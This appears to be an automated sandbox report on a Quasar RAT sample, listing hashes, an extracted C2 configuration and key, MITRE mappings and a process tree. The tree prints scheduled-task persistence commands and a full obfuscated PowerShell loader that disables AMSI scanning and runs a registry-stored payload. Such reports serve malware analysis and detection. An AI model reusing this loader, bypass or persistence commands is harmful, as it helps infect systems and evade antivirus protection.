Analysis

  • max time kernel
    21s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-04-2024 17:15

Errors

Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-21T17:17:05Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win10v2004-20240412-en/instance_13-dirty.qcow2\"}"

General

  • Target

    Sexy.exe

  • Size

    409KB

  • MD5

    4c5faec89139e079202a5208d49ed5a0

  • SHA1

    f26bf551e191af0dd01b5d39ae0c8489d94a877e

  • SHA256

    bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378

  • SHA512

    5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64

  • SSDEEP

    12288:iBwz9kOUJIOSQoxdKIT00N2f3DPcCYDVouW5:i+JLOsVRi3YCYg

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

147.185.221.19:33587

Mutex

$Sxr-zpFqsQjJJh3miBvVnu

Attributes
  • encryption_key

    LxGS9iJRjIMm1rV0MEzT

  • install_name

    BiosUpdX64YDPS.exe

  • log_directory

    $sxr

  • reconnect_delay

    3000

  • startup_key

    $sxr-mtsha

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{c228d10e-601a-4ad7-a857-1f1b98f5d42c}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3052
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:664
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:956
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:412
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:428
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:900
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1020
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1140
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zFnWAWfziQXT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OSgWTEInUlHnjS,[Parameter(Position=1)][Type]$xsMVgxJPjh)$XHyuvQGHxTc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+'e'+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+'e'+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+[Char](97)+'t'+'e'+'T'+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+'d'+''+[Char](44)+'A'+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$XHyuvQGHxTc.DefineConstructor('RT'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+'l'+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+'y'+[Char](83)+'i'+[Char](103)+',P'+'u'+''+'b'+'lic',[Reflection.CallingConventions]::Standard,$OSgWTEInUlHnjS).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$XHyuvQGHxTc.DefineMethod('I'+'n'+'v'+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+'w'+'S'+''+[Char](108)+''+'o'+''+'t'+','+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l',$xsMVgxJPjh,$OSgWTEInUlHnjS).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $XHyuvQGHxTc.CreateType();}$ObGizdZEpbqMh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+'t'+''+'i'+''+[Char](118)+'e'+'M'+''+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$bNNJiuaxmybWzb=$ObGizdZEpbqMh.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+[Char](100)+''+'d'+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iGMfPdZDyxBFBuTEVTQ=zFnWAWfziQXT @([String])([IntPtr]);$JjQXJLlpzGPblBUnkzWlRV=zFnWAWfziQXT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HoQYFWNLZbF=$ObGizdZEpbqMh.GetMethod('G'+'e'+''+'t'+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+'el'+'3'+''+[Char](50)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')));$iaSvohWfmEWxvB=$bNNJiuaxmybWzb.Invoke($Null,@([Object]$HoQYFWNLZbF,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$lEhafGbwMenwSkPgt=$bNNJiuaxmybWzb.Invoke($Null,@([Object]$HoQYFWNLZbF,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'lPr'+[Char](111)+''+'t'+''+[Char](101)+'c'+[Char](116)+'')));$qHmwJBc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iaSvohWfmEWxvB,$iGMfPdZDyxBFBuTEVTQ).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+''+'l'+'');$oUKsxvgTpBhcUzrlL=$bNNJiuaxmybWzb.Invoke($Null,@([Object]$qHmwJBc,[Object](''+'A'+'m'+[Char](115)+'i'+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ColvyCOxoX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lEhafGbwMenwSkPgt,$JjQXJLlpzGPblBUnkzWlRV).Invoke($oUKsxvgTpBhcUzrlL,[uint32]8,4,[ref]$ColvyCOxoX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oUKsxvgTpBhcUzrlL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lEhafGbwMenwSkPgt,$JjQXJLlpzGPblBUnkzWlRV).Invoke($oUKsxvgTpBhcUzrlL,[uint32]8,0x20,[ref]$ColvyCOxoX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'77'+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2548
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1256
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1264
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1312
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                          1⤵
                            PID:1328
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1336
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1416
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                1⤵
                                  PID:1508
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1552
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:1128
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:1244
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:4144
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2292
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:1464
                                              • C:\Windows\system32\sihost.exe
                                                sihost.exe
                                                2⤵
                                                  PID:732
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1564
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                  1⤵
                                                    PID:1572
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1708
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      1⤵
                                                        PID:1720
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                        1⤵
                                                          PID:1824
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1832
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                            1⤵
                                                              PID:1928
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:1936
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:1032
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                  1⤵
                                                                    PID:1548
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2692
                                                                    • C:\Users\Admin\AppData\Local\Temp\Sexy.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Sexy.exe"
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1428
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Sexy.exe" /rl HIGHEST /f
                                                                        2⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:3884
                                                                      • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1920
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:840
                                                                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:432
                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                        "SCHTASKS.exe" /create /tn "$77Sexy.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Sexy.exe'" /sc onlogon /rl HIGHEST
                                                                        2⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1352

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                    Execution

                                                                    Scheduled Task/Job

                                                                    1
                                                                    T1053

                                                                    Persistence

                                                                    Scheduled Task/Job

                                                                    1
                                                                    T1053

                                                                    Privilege Escalation

                                                                    Scheduled Task/Job

                                                                    1
                                                                    T1053

                                                                    Command and Control

                                                                    Web Service

                                                                    1
                                                                    T1102

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                      Filesize

                                                                      162KB

                                                                      MD5

                                                                      152e3f07bbaf88fb8b097ba05a60df6e

                                                                      SHA1

                                                                      c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                      SHA256

                                                                      a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                      SHA512

                                                                      2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                    • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                                      Filesize

                                                                      409KB

                                                                      MD5

                                                                      4c5faec89139e079202a5208d49ed5a0

                                                                      SHA1

                                                                      f26bf551e191af0dd01b5d39ae0c8489d94a877e

                                                                      SHA256

                                                                      bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378

                                                                      SHA512

                                                                      5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64

                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_2oeqwojy.mf0.ps1
                                                                      Filesize

                                                                      60B

                                                                      MD5

                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                      SHA1

                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                      SHA256

                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                      SHA512

                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                    • memory/64-107-0x00007FFDA0890000-0x00007FFDA08A0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/64-108-0x00007FFDE08AF000-0x00007FFDE08B0000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/64-106-0x000002327AE50000-0x000002327AE7B000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/64-89-0x000002327AE50000-0x000002327AE7B000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/616-55-0x000001FA9F4B0000-0x000001FA9F4DB000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/616-56-0x000001FA9F4B0000-0x000001FA9F4DB000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/616-64-0x000001FA9F4B0000-0x000001FA9F4DB000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/616-54-0x000001FA9F480000-0x000001FA9F4A5000-memory.dmp
                                                                      Filesize

                                                                      148KB

                                                                    • memory/616-66-0x00007FFDE08AD000-0x00007FFDE08AE000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/664-82-0x00007FFDE08AD000-0x00007FFDE08AE000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/664-77-0x00000166CD510000-0x00000166CD53B000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/664-68-0x00000166CD510000-0x00000166CD53B000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/664-80-0x00007FFDA0890000-0x00007FFDA08A0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/956-81-0x0000027E7F9D0000-0x0000027E7F9FB000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/956-100-0x0000027E7F9D0000-0x0000027E7F9FB000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/956-102-0x00007FFDA0890000-0x00007FFDA08A0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/956-104-0x00007FFDE08AC000-0x00007FFDE08AD000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1428-22-0x0000000074650000-0x0000000074E00000-memory.dmp
                                                                      Filesize

                                                                      7.7MB

                                                                    • memory/1428-6-0x0000000005790000-0x00000000057A2000-memory.dmp
                                                                      Filesize

                                                                      72KB

                                                                    • memory/1428-1-0x0000000074650000-0x0000000074E00000-memory.dmp
                                                                      Filesize

                                                                      7.7MB

                                                                    • memory/1428-2-0x00000000050E0000-0x0000000005684000-memory.dmp
                                                                      Filesize

                                                                      5.6MB

                                                                    • memory/1428-3-0x0000000004B30000-0x0000000004BC2000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/1428-4-0x0000000004CA0000-0x0000000004CB0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/1428-5-0x0000000004A70000-0x0000000004AD6000-memory.dmp
                                                                      Filesize

                                                                      408KB

                                                                    • memory/1428-0-0x0000000000010000-0x000000000007C000-memory.dmp
                                                                      Filesize

                                                                      432KB

                                                                    • memory/1428-7-0x0000000005CD0000-0x0000000005D0C000-memory.dmp
                                                                      Filesize

                                                                      240KB

                                                                    • memory/1920-88-0x0000000005960000-0x0000000005970000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/1920-79-0x0000000074650000-0x0000000074E00000-memory.dmp
                                                                      Filesize

                                                                      7.7MB

                                                                    • memory/1920-13-0x0000000074650000-0x0000000074E00000-memory.dmp
                                                                      Filesize

                                                                      7.7MB

                                                                    • memory/1920-14-0x0000000005960000-0x0000000005970000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/1920-16-0x0000000006DF0000-0x0000000006DFA000-memory.dmp
                                                                      Filesize

                                                                      40KB

                                                                    • memory/2548-25-0x000001D5B9DD0000-0x000001D5B9DE0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/2548-50-0x00007FFDC1810000-0x00007FFDC22D1000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2548-24-0x00007FFDC1810000-0x00007FFDC22D1000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2548-34-0x000001D5D4240000-0x000001D5D4262000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/2548-35-0x000001D5B9DD0000-0x000001D5B9DE0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/2548-36-0x000001D5D45B0000-0x000001D5D45DA000-memory.dmp
                                                                      Filesize

                                                                      168KB

                                                                    • memory/2548-37-0x00007FFDE0810000-0x00007FFDE0A05000-memory.dmp
                                                                      Filesize

                                                                      2.0MB

                                                                    • memory/2548-38-0x00007FFDDE8F0000-0x00007FFDDE9AE000-memory.dmp
                                                                      Filesize

                                                                      760KB

                                                                    • memory/3052-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/3052-49-0x00007FFDDE8F0000-0x00007FFDDE9AE000-memory.dmp
                                                                      Filesize

                                                                      760KB

                                                                    • memory/3052-48-0x00007FFDE0810000-0x00007FFDE0A05000-memory.dmp
                                                                      Filesize

                                                                      2.0MB

                                                                    • memory/3052-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/3052-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/3052-41-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/3052-43-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/3052-45-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                      Filesize

                                                                      32KB